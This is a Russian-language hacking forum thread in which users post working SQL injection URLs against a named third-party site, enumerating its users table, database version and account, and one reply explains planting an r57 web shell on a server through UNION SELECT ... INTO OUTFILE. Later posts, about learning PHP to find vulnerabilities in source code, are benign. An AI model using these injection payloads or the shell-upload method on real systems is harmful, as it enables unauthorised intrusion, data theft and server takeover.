вообшем такая проблема нашел скуль в 2х в разных параметрах на одном сайте в одном есть полные отсчеты обшибках но нет вывода на экран в другом нету отсчета но есть вывод на экран вотс первый Code: http://www.revolution.co.uk/_forum.php?neuron=1 union select null,null,null,null,null,null,null,null,null,null,null,null,null from users/* проходит без ошибок то есть таблица "users" существует во втором запрос вида Code: http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,aes_decrypt(aes_encrypt(version(),0x71), 0x71),3,aes_decrypt(aes_encrypt(user(),0x71), 0x71),aes_decrypt(aes_encrypt(database(),0x71), 0x71),6,7,8,9/* выдает user,version,database а вот на from userS материться оч интересно почему ?
как загрузить r57 через mysql inj index.php?p=-1+union+select+1,password,3,4,5,6,7,8+from+users/* это типа пароль узнать, а как шелл загрузить?
index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/* так, если конечно инто_аутфаил разрешён...
Задался вопросом научиться искать уязвимости в исходниках. Есть ли среди вас сансеи )) Большая прозьба: не посылать учить языки программирования. На мой взгляд это не обязательно, достаточно уметь читать код(могу ошибаться ) Может кто подскажет или даст на расмотрение несколько наверняка уязвимых скриптов с комментариями?или ссылки на статьи по теме. Ну или... вам виднее.
ок. Но одним языком сыт не будешь. Нужно понять принцип нахождения уязвимостей. Ведь взять для примера людей, которые хорошо знают язык, пишут всякие cms, форумы и т.д. Но сами они, в большинстве, не могут находить уязвимости. ------------------------------------------------------------- читать код можно не умея программировать. ------------------------------------------------------------- Я очень быстро учусь чему-то(если хорошо подсказывают )). И мне важно понять принцип.
Spyder - разве я сказал, что не знаю пхп? Я знаю пхп на уровне ... второго класса )) (могу ,более менее, читать код) - это как испанский со словарем )) -------------------------------------------------------------- если это и есть ответ на мой вопрос, что ж буду грызть книги по php
samarin, просто ты не поймешь почему уязвимость именно тут, и почему это уязвимость и как оно вообще работает, не зная языка. А если просто показать пару шаблонов, то так и будешь "подставлять кавычку" )) Вообщем, надо учить язык, ты это уже и так понял и Spyder ещё сказал)
n0ne - Да, спасибо! Как повышу свой уровень знаний пхп обязательно подниму тему еще раз. ------------------------ какие книги на ваш взгляд самые удачные, чтобы начать детальное(а главное правильное)изучение языка?
samarin, www.intuit.ru - там есть довольно неплохие курсы по php. А потом читай статьи и книги по безопасному программированию на php и была неплохая книженция "php глазами хакера", если не ошибаюсь.
